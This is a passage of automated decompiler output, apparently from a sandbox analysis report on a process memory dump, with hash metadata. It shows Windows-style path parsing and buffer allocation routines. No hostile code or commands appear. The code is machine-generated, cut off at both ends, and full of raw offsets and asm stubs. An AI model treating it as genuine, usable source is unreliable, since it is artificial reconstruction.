                                                							goto L92;
                                                						}
                                                						__eflags =  *((char*)(_t474 - 1));
                                                						if( *((char*)(_t474 - 1)) == 0) {
                                                							goto L92;
                                                						}
                                                						_t301 =  *_t474;
                                                						__eflags = _t494[1] - _t301;
                                                						if(_t494[1] <= _t301) {
                                                							L10:
                                                							__eflags =  *(_t474 - 5) & 0x00000040;
                                                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                								L12:
                                                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                									goto L92;
                                                								}
                                                								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                									goto L92;
                                                								}
                                                								__eflags = _t442 -  *(_t474 - 0x11);
                                                								if(_t442 !=  *(_t474 - 0x11)) {
                                                									goto L92;
                                                								}
                                                								L15:
                                                								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                								 *(_t528 - 0xc0) = _t306;
                                                								 *(_t528 - 0xa4) = _t306;
                                                								__eflags =  *0x16d60e8;
                                                								if( *0x16d60e8 != 0) {
                                                									__eflags = _t306 - 0x40;
                                                									if(_t306 < 0x40) {
                                                										L20:
                                                										asm("lock inc dword [eax]");
                                                										_t310 =  *0x16d60e8; // 0x0
                                                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                										__eflags = _t311 & 0x00000001;
                                                										if((_t311 & 0x00000001) == 0) {
                                                											 *(_t528 - 0xa0) = _t311;
                                                											_t475 = _t427;
                                                											 *(_t528 - 0x74) = _t427;
                                                											__eflags = _t475;
                                                											if(_t475 != 0) {
                                                												L91:
                                                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                												goto L92;
                                                											}
                                                											asm("sbb edi, edi");
                                                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                											_t511 = _t498;
                                                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                											__eflags =  *(_t312 - 5) & 1;
                                                											if(( *(_t312 - 5) & 1) != 0) {
                                                												_push(_t528 - 0x98);
                                                												_push(0x4c);
                                                												_push(_t528 - 0x70);
                                                												_push(1);
                                                												_push(0xfffffffa);
                                                												_t412 = E01629710();
                                                												_t475 = _t427;
                                                												__eflags = _t412;
                                                												if(_t412 >= 0) {
                                                													_t414 =  *(_t528 - 0x98) - 8;
                                                													 *(_t528 - 0x98) = _t414;
                                                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                													 *(_t528 - 0x8c) = _t416;
                                                													 *(_t528 - 0x79) = 1;
                                                													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                													__eflags = _t511;
                                                												}
                                                											}
                                                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                											__eflags = _t446 & 0x00000004;
                                                											if((_t446 & 0x00000004) != 0) {
                                                												__eflags =  *(_t528 - 0x9c);
                                                												if( *(_t528 - 0x9c) != 0) {
                                                													 *(_t528 - 0x7a) = 1;
                                                													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                													__eflags = _t511;
                                                												}
                                                											}
                                                											_t313 = 2;
                                                											_t447 = _t446 & _t313;
                                                											__eflags = _t447;
                                                											 *(_t528 - 0xd4) = _t447;
                                                											if(_t447 != 0) {
                                                												_t406 = 0x10;
                                                												_t511 = _t511 + _t406;
                                                												__eflags = _t511;
                                                											}
                                                											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                											 *(_t528 - 0x88) = _t427;
                                                											__eflags =  *(_t528 + 0x1c);
                                                											if( *(_t528 + 0x1c) <= 0) {
                                                												L45:
                                                												__eflags =  *(_t528 - 0xb0);
                                                												if( *(_t528 - 0xb0) != 0) {
                                                													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                													__eflags = _t511;
                                                												}
                                                												__eflags = _t475;
                                                												if(_t475 != 0) {
                                                													asm("lock dec dword [ecx+edx*8+0x4]");
                                                													goto L100;
                                                												} else {
                                                													_t494[3] = _t511;
                                                													_t451 =  *(_t528 - 0xa0);
                                                													_t427 = E01626DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                													 *(_t528 - 0x88) = _t427;
                                                													__eflags = _t427;
                                                													if(_t427 == 0) {
                                                														__eflags = _t511 - 0xfff8;
                                                														if(_t511 <= 0xfff8) {
                                                															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                															asm("sbb ecx, ecx");
                                                															__eflags = (_t451 & 0x000000e2) + 8;
                                                														}
                                                														asm("lock dec dword [eax+edx*8+0x4]");
                                                														L100:
                                                														goto L101;
                                                													}
                                                													_t453 =  *(_t528 - 0xa0);
                                                													 *_t494 = _t453;
                                                													_t494[1] = _t427;
                                                													_t494[2] =  *(_t528 - 0xbc);
                                                													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													__eflags =  *(_t528 + 0x14);
                                                													if( *(_t528 + 0x14) == 0) {
                                                														__eflags =  *[fs:0x18] + 0xf50;
                                                													}
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													asm("movsd");
                                                													__eflags =  *(_t528 + 0x18);
                                                													if( *(_t528 + 0x18) == 0) {
                                                														_t454 =  *(_t528 - 0x80);
                                                														_t479 =  *(_t528 - 0x78);
                                                														_t327 = 1;
                                                														__eflags = 1;
                                                													} else {
                                                														_t146 = _t427 + 0x50; // 0x50
                                                														_t454 = _t146;
                                                														 *(_t528 - 0x80) = _t454;
                                                														_t382 = 0x18;
                                                														 *_t454 = _t382;
                                                														 *((short*)(_t454 + 2)) = 1;
                                                														_t385 = 0x10;
                                                														 *((short*)(_t454 + 6)) = _t385;
                                                														 *(_t454 + 4) = 0;
                                                														asm("movsd");
                                                														asm("movsd");
                                                														asm("movsd");
                                                														asm("movsd");
                                                														_t327 = 1;
                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                														_t479 = 0x68;
                                                														 *(_t528 - 0x78) = _t479;
                                                													}
                                                													__eflags =  *(_t528 - 0x79) - _t327;
                                                													if( *(_t528 - 0x79) == _t327) {
                                                														_t524 = _t479 + _t427;
                                                														_t508 =  *(_t528 - 0x8c);
                                                														 *_t524 = _t508;
                                                														_t373 = 2;
                                                														 *((short*)(_t524 + 2)) = _t373;
                                                														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                														 *((short*)(_t524 + 4)) = 0;
                                                														_t167 = _t524 + 8; // 0x8
                                                														E0162F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                														_t529 = _t529 + 0xc;
                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                														 *(_t528 - 0x78) = _t479;
                                                														_t380 =  *(_t528 - 0x80);
                                                														__eflags = _t380;
                                                														if(_t380 != 0) {
                                                															_t173 = _t380 + 4;
                                                															 *_t173 =  *(_t380 + 4) | 1;
                                                															__eflags =  *_t173;
                                                														}
                                                														_t454 = _t524;
                                                														 *(_t528 - 0x80) = _t454;
                                                														_t327 = 1;
                                                														__eflags = 1;
                                                													}
                                                													__eflags =  *(_t528 - 0xd4);
                                                													if( *(_t528 - 0xd4) == 0) {
                                                														_t505 =  *(_t528 - 0x80);
                                                													} else {
                                                														_t505 = _t479 + _t427;
                                                														_t523 = 0x10;
                                                														 *_t505 = _t523;
                                                														_t367 = 3;
                                                														 *((short*)(_t505 + 2)) = _t367;
                                                														_t368 = 4;
                                                														 *((short*)(_t505 + 6)) = _t368;
                                                														 *(_t505 + 4) = 0;
                                                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                														_t327 = 1;
                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                														_t479 = _t479 + _t523;
                                                														 *(_t528 - 0x78) = _t479;
                                                														__eflags = _t454;
                                                														if(_t454 != 0) {
                                                															_t186 = _t454 + 4;
                                                															 *_t186 =  *(_t454 + 4) | 1;
                                                															__eflags =  *_t186;
                                                														}
                                                														 *(_t528 - 0x80) = _t505;
                                                													}
                                                													__eflags =  *(_t528 - 0x7a) - _t327;
                                                													if( *(_t528 - 0x7a) == _t327) {
                                                														 *(_t528 - 0xd4) = _t479 + _t427;
                                                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                														E0162F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                														_t529 = _t529 + 0xc;
                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                														_t479 =  *(_t528 - 0x78) + _t522;
                                                														 *(_t528 - 0x78) = _t479;
                                                														__eflags = _t505;
                                                														if(_t505 != 0) {
                                                															_t199 = _t505 + 4;
                                                															 *_t199 =  *(_t505 + 4) | 1;
                                                															__eflags =  *_t199;
                                                														}
                                                														_t505 =  *(_t528 - 0xd4);
                                                														 *(_t528 - 0x80) = _t505;
                                                													}
                                                													__eflags =  *(_t528 - 0xa8);
                                                													if( *(_t528 - 0xa8) != 0) {
                                                														_t356 = _t479 + _t427;
                                                														 *(_t528 - 0xd4) = _t356;
                                                														_t462 =  *(_t528 - 0xac);
                                                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                														_t485 = 0xc;
                                                														 *((short*)(_t356 + 2)) = _t485;
                                                														 *(_t356 + 6) = _t462;
                                                														 *((short*)(_t356 + 4)) = 0;
                                                														_t211 = _t356 + 8; // 0x9
                                                														E0162F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                														E0162FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                														_t529 = _t529 + 0x18;
                                                														_t427 =  *(_t528 - 0x88);
                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                														_t505 =  *(_t528 - 0xd4);
                                                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                														 *(_t528 - 0x78) = _t479;
                                                														_t362 =  *(_t528 - 0x80);
                                                														__eflags = _t362;
                                                														if(_t362 != 0) {
                                                															_t222 = _t362 + 4;
                                                															 *_t222 =  *(_t362 + 4) | 1;
                                                															__eflags =  *_t222;
                                                														}
                                                													}
                                                													__eflags =  *(_t528 - 0xb0);
                                                													if( *(_t528 - 0xb0) != 0) {
                                                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                														_t458 = 0xb;
                                                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                														E0162FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                														_t529 = _t529 + 0xc;
                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                														 *(_t528 - 0x78) = _t479;
                                                														__eflags = _t505;
                                                														if(_t505 != 0) {
                                                															_t241 = _t505 + 4;
                                                															 *_t241 =  *(_t505 + 4) | 1;
                                                															__eflags =  *_t241;
                                                														}
                                                													}
                                                													_t328 =  *(_t528 + 0x1c);
                                                													__eflags = _t328;
                                                													if(_t328 == 0) {
                                                														L87:
                                                														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                														_t455 =  *(_t528 - 0xdc);
                                                														 *(_t427 + 0x14) = _t455;
                                                														_t480 =  *(_t528 - 0xa0);
                                                														_t517 = 3;
                                                														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                															asm("rdtsc");
                                                															 *(_t427 + 0x3c) = _t480;
                                                														} else {
                                                															 *(_t427 + 0x3c) = _t455;
                                                														}
                                                														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                														_t456 =  *[fs:0x18];
                                                														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                														_t427 = 0;
                                                														__eflags = 0;
                                                														_t511 = 0x18;
                                                														goto L91;
                                                													} else {
                                                														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                														__eflags = _t519;
                                                														 *(_t528 - 0x8c) = _t328;
                                                														do {
                                                															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                																_t334 =  *_t519;
                                                															} else {
                                                																_t334 = 0;
                                                															}
                                                															_t336 = _t334 & 0x000000ff;
                                                															__eflags = _t336;
                                                															_t427 =  *(_t528 - 0x88);
                                                															if(_t336 == 0) {
                                                																_t481 = _t479 + _t506;
                                                																__eflags = _t481;
                                                																 *(_t528 - 0x78) = _t481;
                                                																E0162F3E0(_t479 + _t427, _t457, _t506);
                                                																_t529 = _t529 + 0xc;
                                                															} else {
                                                																_t340 = _t336 - 1;
                                                																__eflags = _t340;
                                                																if(_t340 == 0) {
                                                																	E0162F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                																	_t529 = _t529 + 0xc;
                                                																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                																} else {
                                                																	__eflags = _t340 == 0;
                                                																	if(_t340 == 0) {
                                                																		__eflags = _t506 - 8;
                                                																		if(_t506 == 8) {
                                                																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                															_t339 = 0x10;
                                                															_t519 = _t519 + _t339;
                                                															_t263 = _t528 - 0x8c;
                                                															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                															__eflags =  *_t263;
                                                															_t479 =  *(_t528 - 0x78);
                                                														} while ( *_t263 != 0);
                                                														goto L87;
                                                													}
                                                												}
                                                											} else {
                                                												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                												 *(_t528 - 0xa2) = _t392;
                                                												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                												__eflags = _t469;
                                                												while(1) {
                                                													 *(_t528 - 0xe4) = _t511;
                                                													__eflags = _t392;
                                                													_t393 = _t427;
                                                													if(_t392 != 0) {
                                                														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                													}
                                                													_t395 = (_t393 & 0x000000ff) - _t427;
                                                													__eflags = _t395;
                                                													if(_t395 == 0) {
                                                														_t511 = _t511 +  *_t469;
                                                														__eflags = _t511;
                                                													} else {
                                                														_t398 = _t395 - 1;
                                                														__eflags = _t398;
                                                														if(_t398 == 0) {
                                                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                														} else {
                                                															__eflags = _t398 == 1;
                                                															if(_t398 == 1) {
                                                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                																_t402 =  *_t469 & 0x0000ffff;
                                                																 *(_t528 - 0xac) = _t402;
                                                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                															}
                                                														}
                                                													}
                                                													__eflags = _t511 -  *(_t528 - 0xe4);
                                                													if(_t511 <  *(_t528 - 0xe4)) {
                                                														break;
                                                													}
                                                													_t397 =  *(_t528 - 0x88) + 1;
                                                													 *(_t528 - 0x88) = _t397;
                                                													_t469 = _t469 + 0x10;
                                                													__eflags = _t397 -  *(_t528 + 0x1c);
                                                													_t392 =  *(_t528 - 0xa2);
                                                													if(_t397 <  *(_t528 + 0x1c)) {
                                                														continue;
                                                													}
                                                													goto L45;
                                                												}
                                                												_t475 = 0x216;
                                                												 *(_t528 - 0x74) = 0x216;
                                                												goto L45;
                                                											}
                                                										} else {
                                                											asm("lock dec dword [eax+ecx*8+0x4]");
                                                											goto L16;
                                                										}
                                                									}
                                                									_t491 = E016B4CAB(_t306, _t528 - 0xa4);
                                                									 *(_t528 - 0x74) = _t491;
                                                									__eflags = _t491;
                                                									if(_t491 != 0) {
                                                										goto L91;
                                                									} else {
                                                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                										goto L20;
                                                									}
                                                								}
                                                								L16:
                                                								 *(_t528 - 0x74) = 0x1069;
                                                								L93:
                                                								_t298 =  *(_t528 - 0xd0) + 1;
                                                								 *(_t528 - 0xd0) = _t298;
                                                								_t474 = _t474 + _t511;
                                                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                								_t494 = 4;
                                                								__eflags = _t298 - _t494;
                                                								if(_t298 >= _t494) {
                                                									goto L100;
                                                								}
                                                								_t494 =  *(_t528 - 0xcc);
                                                								_t435 = _t298;
                                                								continue;
                                                							}
                                                							__eflags = _t494[2] | _t494[3];
                                                							if((_t494[2] | _t494[3]) == 0) {
                                                								goto L15;
                                                							}
                                                							goto L12;
                                                						}
                                                						__eflags = _t301;
                                                						if(_t301 != 0) {
                                                							goto L92;
                                                						}
                                                						goto L10;
                                                						L92:
                                                						goto L93;
                                                					}
                                                				} else {
                                                					_push(0x57);
                                                					L101:
                                                					return E0163D130(_t427, _t494, _t511);
                                                				}
                                                			}











































































                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 818cf56e5a56b98165a00beb0c7a9d877f9498ca27d870094492a0c662ee14a2
                                                • Instruction ID: c3c0dfba0cdf280b52dc7f928f0ef976fd13d65e968bc33eed87f9ea9a0ed8c5
                                                • Opcode Fuzzy Hash: 818cf56e5a56b98165a00beb0c7a9d877f9498ca27d870094492a0c662ee14a2
                                                • Instruction Fuzzy Hash: 094237759012298FDB24CF68CD80BE9BBB1FF49304F1481AAD94DAB342D7749985CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E01604120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                				signed int _v8;
                                                				void* _v20;
                                                				signed int _v24;
                                                				char _v532;
                                                				char _v540;
                                                				signed short _v544;
                                                				signed int _v548;
                                                				signed short* _v552;
                                                				signed short _v556;
                                                				signed short* _v560;
                                                				signed short* _v564;
                                                				signed short* _v568;
                                                				void* _v570;
                                                				signed short* _v572;
                                                				signed short _v576;
                                                				signed int _v580;
                                                				char _v581;
                                                				void* _v584;
                                                				unsigned int _v588;
                                                				signed short* _v592;
                                                				void* _v597;
                                                				void* _v600;
                                                				void* _v604;
                                                				void* _v609;
                                                				void* _v616;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				unsigned int _t161;
                                                				signed int _t162;
                                                				unsigned int _t163;
                                                				void* _t169;
                                                				signed short _t173;
                                                				signed short _t177;
                                                				signed short _t181;
                                                				unsigned int _t182;
                                                				signed int _t185;
                                                				signed int _t213;
                                                				signed int _t225;
                                                				short _t233;
                                                				signed char _t234;
                                                				signed int _t242;
                                                				signed int _t243;
                                                				signed int _t244;
                                                				signed int _t245;
                                                				signed int _t250;
                                                				void* _t251;
                                                				signed short* _t254;
                                                				void* _t255;
                                                				signed int _t256;
                                                				void* _t257;
                                                				signed short* _t260;
                                                				signed short _t265;
                                                				signed short* _t269;
                                                				signed short _t271;
                                                				signed short** _t272;
                                                				signed short* _t275;
                                                				signed short _t282;
                                                				signed short _t283;
                                                				signed short _t290;
                                                				signed short _t299;
                                                				signed short _t307;
                                                				signed int _t308;
                                                				signed short _t311;
                                                				signed short* _t315;
                                                				signed short _t316;
                                                				void* _t317;
                                                				void* _t319;
                                                				signed short* _t321;
                                                				void* _t322;
                                                				void* _t323;
                                                				unsigned int _t324;
                                                				signed int _t325;
                                                				void* _t326;
                                                				signed int _t327;
                                                				signed int _t329;
                                                
                                                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                				_v8 =  *0x16dd360 ^ _t329;
                                                				_t157 = _a8;
                                                				_t321 = _a4;
                                                				_t315 = __edx;
                                                				_v548 = __ecx;
                                                				_t305 = _a20;
                                                				_v560 = _a12;
                                                				_t260 = _a16;
                                                				_v564 = __edx;
                                                				_v580 = _a8;
                                                				_v572 = _t260;
                                                				_v544 = _a20;
                                                				if( *__edx <= 8) {
                                                					L3:
                                                					if(_t260 != 0) {
                                                						 *_t260 = 0;
                                                					}
                                                					_t254 =  &_v532;
                                                					_v588 = 0x208;
                                                					if((_v548 & 0x00000001) != 0) {
                                                						_v556 =  *_t315;
                                                						_v552 = _t315[2];
                                                						_t161 = E0161F232( &_v556);
                                                						_t316 = _v556;
                                                						_v540 = _t161;
                                                						goto L17;
                                                					} else {
                                                						_t306 = 0x208;
                                                						_t298 = _t315;
                                                						_t316 = E01606E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                						if(_t316 == 0) {
                                                							L68:
                                                							_t322 = 0xc0000033;
                                                							goto L39;
                                                						} else {
                                                							while(_v581 == 0) {
                                                								_t233 = _v588;
                                                								if(_t316 > _t233) {
                                                									_t234 = _v548;
                                                									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                										_t254 = L01604620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                										if(_t254 == 0) {
                                                											_t169 = 0xc0000017;
                                                										} else {
                                                											_t298 = _v564;
                                                											_v588 = _t316;
                                                											_t306 = _t316;
                                                											_t316 = E01606E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                											if(_t316 != 0) {
                                                												continue;
                                                											} else {
                                                												goto L68;
                                                											}
                                                										}
                                                									} else {
                                                										goto L90;
                                                									}
                                                								} else {
                                                									_v556 = _t316;
                                                									 *((short*)(_t329 + 0x32)) = _t233;
                                                									_v552 = _t254;
                                                									if(_t316 < 2) {
                                                										L11:
                                                										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                											_t161 = 5;
                                                										} else {
                                                											if(_t316 < 6) {
                                                												L87:
                                                												_t161 = 3;
                                                											} else {
                                                												_t242 = _t254[2] & 0x0000ffff;
                                                												if(_t242 != 0x5c) {
                                                													if(_t242 == 0x2f) {
                                                														goto L16;
                                                													} else {
                                                														goto L87;
                                                													}
                                                													goto L101;
                                                												} else {
                                                													L16:
                                                													_t161 = 2;
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_t243 =  *_t254 & 0x0000ffff;
                                                										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                											if(_t316 < 4) {
                                                												L81:
                                                												_t161 = 4;
                                                												goto L17;
                                                											} else {
                                                												_t244 = _t254[1] & 0x0000ffff;
                                                												if(_t244 != 0x5c) {
                                                													if(_t244 == 0x2f) {
                                                														goto L60;
                                                													} else {
                                                														goto L81;
                                                													}
                                                												} else {
                                                													L60:
                                                													if(_t316 < 6) {
                                                														L83:
                                                														_t161 = 1;
                                                														goto L17;
                                                													} else {
                                                														_t245 = _t254[2] & 0x0000ffff;
                                                														if(_t245 != 0x2e) {
                                                															if(_t245 == 0x3f) {
                                                																goto L62;
                                                															} else {
                                                																goto L83;
                                                															}
                                                														} else {
                                                															L62:
                                                															if(_t316 < 8) {
                                                																L85:
                                                																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                																goto L17;
                                                															} else {
                                                																_t250 = _t254[3] & 0x0000ffff;
                                                																if(_t250 != 0x5c) {
                                                																	if(_t250 == 0x2f) {
                                                																		goto L64;
                                                																	} else {
                                                																		goto L85;
                                                																	}
                                                																} else {
                                                																	L64:
                                                																	_t161 = 6;
                                                																	goto L17;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                											goto L101;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									}
                                                									L17:
                                                									if(_t161 != 2) {
                                                										_t162 = _t161 - 1;
                                                										if(_t162 > 5) {
                                                											goto L18;
                                                										} else {
                                                											switch( *((intOrPtr*)(_t162 * 4 +  &M016045F8))) {
                                                												case 0:
                                                													_v568 = 0x15c1078;
                                                													__eax = 2;
                                                													goto L20;
                                                												case 1:
                                                													goto L18;
                                                												case 2:
                                                													_t163 = 4;
                                                													goto L19;
                                                											}
                                                										}
                                                										goto L41;
                                                									} else {
                                                										L18:
                                                										_t163 = 0;
                                                										L19:
                                                										_v568 = 0x15c11c4;
                                                									}
                                                									L20:
                                                									_v588 = _t163;
                                                									_v564 = _t163 + _t163;
                                                									_t306 =  *_v568 & 0x0000ffff;
                                                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                									_v576 = _t265;
                                                									if(_t265 > 0xfffe) {
                                                										L90:
                                                										_t322 = 0xc0000106;
                                                									} else {
                                                										if(_t321 != 0) {
                                                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                												if(_v580 != 0) {
                                                													goto L23;
                                                												} else {
                                                													_t322 = 0xc0000106;
                                                													goto L39;
                                                												}
                                                											} else {
                                                												_t177 = _t306;
                                                												goto L25;
                                                											}
                                                											goto L101;
                                                										} else {
                                                											if(_v580 == _t321) {
                                                												_t322 = 0xc000000d;
                                                											} else {
                                                												L23:
                                                												_t173 = L01604620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                												_t269 = _v592;
                                                												_t269[2] = _t173;
                                                												if(_t173 == 0) {
                                                													_t322 = 0xc0000017;
                                                												} else {
                                                													_t316 = _v556;
                                                													 *_t269 = 0;
                                                													_t321 = _t269;
                                                													_t269[1] = _v576;
                                                													_t177 =  *_v568 & 0x0000ffff;
                                                													L25:
                                                													_v580 = _t177;
                                                													if(_t177 == 0) {
                                                														L29:
                                                														_t307 =  *_t321 & 0x0000ffff;
                                                													} else {
                                                														_t290 =  *_t321 & 0x0000ffff;
                                                														_v576 = _t290;
                                                														_t310 = _t177 & 0x0000ffff;
                                                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                															_t307 =  *_t321 & 0xffff;
                                                														} else {
                                                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                															E0162F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                															_t329 = _t329 + 0xc;
                                                															_t311 = _v580;
                                                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                															 *_t321 = _t225;
                                                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                															}
                                                															goto L29;
                                                														}
                                                													}
                                                													_t271 = _v556 - _v588 + _v588;
                                                													_v580 = _t307;
                                                													_v576 = _t271;
                                                													if(_t271 != 0) {
                                                														_t308 = _t271 & 0x0000ffff;
                                                														_v588 = _t308;
                                                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                															E0162F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                															_t329 = _t329 + 0xc;
                                                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                															 *_t321 = _t213;
                                                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                															}
                                                														}
                                                													}
                                                													_t272 = _v560;
                                                													if(_t272 != 0) {
                                                														 *_t272 = _t321;
                                                													}
                                                													_t306 = 0;
                                                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                													_t275 = _v572;
                                                													if(_t275 != 0) {
                                                														_t306 =  *_t275;
                                                														if(_t306 != 0) {
                                                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                														}
                                                													}
                                                													_t181 = _v544;
                                                													if(_t181 != 0) {
                                                														 *_t181 = 0;
